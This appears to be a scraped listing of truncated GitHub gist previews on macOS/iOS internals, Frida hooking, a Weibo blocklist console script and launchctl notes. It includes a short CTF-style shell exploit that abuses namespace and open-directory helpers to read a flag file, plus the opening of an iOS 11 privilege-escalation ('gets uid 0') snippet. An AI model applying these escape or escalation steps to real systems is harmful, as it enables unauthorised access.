+------------------+
|These push their | +-----------------------+
|respective syscall| |This overwrites the |
|dispatch functions| |saved dispatch function|
|onto the stack | |with hndl_alltraps |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def fuzzyfinder(p, l): | |
return map(lambda t: t[0], sorted(filter(lambda t: all(map(lambda x: x != -1, t[1])), map(lambda s: (s,map(s.find, p)), l)), key=lambda t: t[1])) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
echo 'sleep 600' | /tmp/unshare & | |
sleep 1; | |
echo 'echo -e "r\n/proc/self/fd/3/vault/flag" | /home/adam/vault_explorer' | /tmp/opendir /proc/$!/root |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// | |
// main.c | |
// macho-syms | |
// | |
// Created by C0deH4cker on 3/19/16. | |
// Copyright © 2016 C0deH4cker. All rights reserved. | |
// | |
#include <stdio.h> | |
#include <stdlib.h> |
$ clang -Wall -Os -pipe -g3 frida-gum-example.c -o frida-gum-example -L. -lfrida-gum -lresolv -Wl,-dead_strip -Wl,-no_compact_unwind
$ ./frida-gum-example
[*] open("/etc/hosts")
[*] close(3)
[*] open("/etc/fstab")
[*] close(-1)
[*] listener got 4 calls
[*] listener still has 4 calls
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// HIServicesPrivate.h v1 | |
// By ThatsJustCheesy | |
// TO USE THESE INTERFACES, you MUST link against ApplicationServices.framework. | |
#pragma once | |
#ifdef __cplusplus | |
extern "C" { | |
#endif |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// 1. 使用 chrome 打开 weibo.com (确保你登录了微博) | |
// 2. 打开调试窗口,在 console 中贴下面的代码后回车 | |
// 数据来自:https://github.com/yu961549745/WeiboBlackList | |
let dogs = [ 5471246591, 5209943797, 1709070650, 1887921907, 1824515351, 6031549751, 3477430640, 5303365027, 2397004535, 5014141958, 2357033797, 2253196910, 1282371413, 5433169859, 5577097996, 2477460747, 5791757379, 3973075219, 5480191060, 5064046310, 1794010902, 5241254653, 1775613335, 1749775825, 2898929101, 1766122373, 5330205046, 5836217079, 2143736030, 5088125436, 2122838230, 2379528185, 5768433920, 1588830357, 2734746975, 1702267517, 3305446403, 1922854483, 2240459775, 1713064495, 3141318761, 3049734521, 1297708027, 1670201221, 1113091931, 2682353630, 1889031894, 5736617825, 5573535479, 1787098822, 5474940961, 2647495542, 1978558182, 5675487085, 2066669447, 1410124131, 3318338712, 5117947348, 5984813988, 1935760780, 2106405744, 1658278557, 3123751063, 2418980745, 5612086708, 2822792580, 2728966594, 5651704821, 3174983660, 2884830430, 1409910532, 5289026864, 5460203843, 30409 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// gets uid 0 (iOS 11) | |
// add patchfinder and you should be good | |
// Abraham Masri @cheesecakeufo | |
/* | |
* Purpose: iterates over the procs and finds our proc | |
*/ | |
uint64_t get_our_proc() { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Moved here: https://github.com/Siguza/misc/blob/master/dsc_syms.c |
I've never had great understanding of launchctl but the deprecation of the old commands with launchctl 2 (10.10) has been terrible as all resources only cover the old commands, and documentation for Apple utilities is generally disgracefully bad, with launchctl not dissembling.
Mad props to https://babodee.wordpress.com/2016/04/09/launchctl-2-0-syntax/ which contains most details
Internally, launchd has several domains, but launchctl 1 would only ask for service names,